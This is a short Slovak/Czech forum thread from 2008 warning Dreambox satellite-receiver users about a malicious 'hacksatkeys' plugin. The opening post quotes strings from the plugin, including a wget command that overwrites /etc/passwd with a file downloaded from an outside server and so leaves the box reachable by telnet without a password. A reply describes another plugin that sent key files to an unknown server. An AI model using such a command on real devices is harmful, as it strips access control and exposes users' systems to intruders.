04.12.2008, 00:29.16 | |
pozor na hacksatkeys plugin na stahovanie keys !!len tak nahmatkovo z dlhej chvile kym sa spajkovacka nahriala som polozil po dreame a zaujal ma subor hacksatkeys.so v ktorom som letmym pohladom cez F3 total commandera nasiel totok:Wait please Your Dreambox Pasword is resetting... wget -O /etc/passwd http://www.uydu.ws/passwd echo Exit Now Now connect to your dreambox without password. Using telnet and run passwd command for create new password.. HackSat.Org Team @alimansur @asus @coscos @ozzymanborn @sevmek46 @tonytr @uyducu Wait please all hacksat keys is removing now... hmm, takze reset password, log ipcky na nejakom servery otvorena cesta na dream bez firewallu.. pozor na to !! |
![]() Vlado Fogo |
04.12.2008, 00:30.43 | |
RE: pozor na hacksatkeys plugin na stahovanie...niektore znaky ako apostrof pred exit now som musel vymazat nakolko neslo odoslat prispevok - zrejme nejaka miestna ochrana voci non standart znakom .. |
![]() Vlado Fogo |
04.12.2008, 03:31.28 | |
RE: pozor na hacksatkeys plugin na stahovanie...Spíš by mělo veřejnost zajímat kdo to ti "hackeři" jsou a pro koho pracují, pak by bylo vše jasné. |
![]() TDB |
04.12.2008, 06:36.35 | |
RE: pozor na hacksatkeys plugin na stahovanie...star znama vec, nic noveho pod suncem turek se snazi az moc |
![]() rj45 |
04.12.2008, 08:29.41 | |
RE: pozor na hacksatkeys plugin na stahovanie...jj, posledne t.j. cca pred 3 rokmi som videl podobny plugin. ktory dokoncagzivoval cely /var/keys/ a posielal kdesi na neznamy server ..hold vymyselnici vzdy boli a aj budu |
![]() Vlado Fogo |
04.12.2008, 08:41.27 | |
RE: pozor na hacksatkeys plugin na stahovanie...o a preto treba pouzit firewall alebo nepouzivat tento plugin |
![]() Bruty |
04.12.2008, 19:47.24 | |
Vlado FogoBoží mlýny melou pomalu ale jistě.Jak se do lesa volá tak se z něj ozývá. Rv :laughing: :laughing: :laughing: |
![]() Fogo hogo |